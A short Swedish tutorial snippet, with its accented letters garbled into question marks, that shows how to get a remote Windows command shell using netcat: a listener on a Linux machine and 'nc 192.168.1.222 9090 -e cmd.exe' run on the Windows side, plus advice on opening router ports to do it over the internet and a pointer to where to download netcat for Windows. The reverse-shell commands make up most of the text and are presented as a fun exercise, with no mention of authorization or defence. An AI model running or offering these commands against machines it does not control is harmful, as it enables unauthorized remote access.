P? din linux maskin skriver du

nc -l 9090

P? fj?rrdatorn (windows) skriver du

nc 192.168.1.222 9090 -e cmd.exe

Vips lustigt s? har du ett dos-shell fr?n windows maskinen i ditt linux shell. Om du vill g?ra denna ?vning ?ver internet s? m?ste r?tt portar ?ppnas i de routrar p? v?gen mellan maskinerna.

Netcat (nc) finns default i de flesta linux, f?r windows s? m?ste du ladda ner filen fr?n SecurityFocus eller eller fr?n mig (samma fil)